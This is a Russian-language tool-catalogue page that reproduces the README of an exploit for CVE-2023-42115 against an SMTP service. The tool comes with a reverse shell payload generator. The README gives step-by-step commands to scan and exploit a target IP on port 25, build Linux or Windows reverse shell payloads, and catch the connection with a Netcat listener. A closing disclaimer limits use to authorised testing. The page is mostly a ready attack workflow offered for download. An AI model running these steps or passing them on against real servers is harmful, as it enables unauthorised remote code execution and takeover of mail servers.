Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2023-42115 — Генератор эксплойтов и reverse shell payload на Python для CVE-2023-42115 с режимами сканирования и эксплуатации и созданием кроссплатформенных payload. | Kitploit
Инструменты/GitHubGitHub/kirinse/cve-2023-42115
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияШелл-кодТестирование на ПроникновениеРазработка Полезной Нагрузки
GitHubkirinse/cve-2023-42115

cve-2023-42115

Генератор эксплойтов и reverse shell payload на Python для CVE-2023-42115 с режимами сканирования и эксплуатации и созданием кроссплатформенных payload.

Репозиторий
94152 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-42115: Скрипты эксплуатации и генерации полезной нагрузки

Этот репозиторий содержит два скрипта Python:

  1. exploit.py: Скрипт для эксплуатации CVE-2023-42115.
  2. generate_payload.py: Скрипт для генерации полезных нагрузок reverse shell.

Предварительные требования

Перед запуском скриптов убедитесь, что в вашей системе установлен Python 3.

Установка

  1. Клонирование репозитория:

    git clone https://github.com/isotaka134/cve-2023-42115.git
    cd cve-2023-42115
    
  2. Установка зависимостей:

Установите необходимые библиотеки Python с помощью pip. Выполните следующую команду для установки всех зависимостей, перечисленных в requirements.txt:

pip install -r requirements.txt

Использование

exploit.py

Этот скрипт эксплуатирует уязвимость CVE-2023-42115.

python exploit.py -t <target_ip> -p <target_port> [options]

Опции:

-t: IP-адрес цели.

-p: Порт целевого сервиса.

Пример:

  1. Сканирование цели
    python exploit.py -t 192.168.1.10 -p 25  --mode SCAN
    
  2. Эксплуатация уязвимости
    python exploit.py -t 192.168.1.10 -p 25 --mode EXPLOIT -f /path/to/payload.sh
    

generate_payload.py

Этот скрипт генерирует полезную нагрузку reverse shell на основе ввода пользователя.

 python generate_payload.py

Шаги:

Скрипт запросит следующую информацию:

A. Тип полезной нагрузки ( linux или windows)

B. Локальный IP: адрес для обратного подключения

C. Локальный порт: для обратного подключения ** Примечание: Если вы находитесь за маршрутизатором или используете NAT, убедитесь, что настроили корректную переадресацию портов на ваше устройство, запускающее Netcat.**

D. Имя выходного файла (например, payload.sh для Linux или payload.ps1 для Windows)

Пример:

python generate_payload.py
Payload Generator
Enter payload type (linux/windows): Linux 
Enter local IP address: 127.0.0.1
Enter local port: 4444
Enter output file name (e.g., payload.sh or payload.ps1): Payload.sh
Payload saved to Payload.sh

Настройка слушателя

Вам нужно настроить слушатель на вашей локальной машине для приема reverse shell. Вы можете использовать Netcat (nc) для этого.

  1. Для Linux: Откройте терминал и запустите слушатель Netcat:
  nc -lvnp <YOUR_LOCAL_PORT>
  1. Для Windows: Откройте командную строку и запустите слушатель Netcat:
  nc -lvnp <YOUR_LOCAL_PORT>

Следуя этим шагам, вы сможете создать и использовать полезную нагрузку для эксплуатации CVE-2023-42115 и получить обратное подключение reverse shell.

Вклад

Если у вас есть предложения по улучшению или вы хотите внести свой вклад, пожалуйста, откройте issue или отправьте pull request.

Отказ от ответственности

  1. Юридическое предупреждение: Этот скрипт предназначен для образовательных целей и этического тестирования. Несанкционированное использование против систем, которые вам не принадлежат или на тестирование которых у вас нет явного разрешения, является незаконным и наказуемо по закону.
  2. Этическое использование: Используйте этот скрипт ответственно и только в средах, где вы можете проводить тестирование безопасности.

Устранение неполадок

  1. Проблемы с подключением: Проверьте, доступна ли цель и работает ли служба SMTP
  2. Обнаружение уязвимости: Убедитесь, что баннер службы соответствует ожидаемому результату проверки уязвимости.
  3. Выполнение полезной нагрузки: Убедитесь, что файл полезной нагрузки правильно отформатирован и доступен.

Контакты

По вопросам или за поддержкой обращайтесь

 [email protected]
Скачать инструмент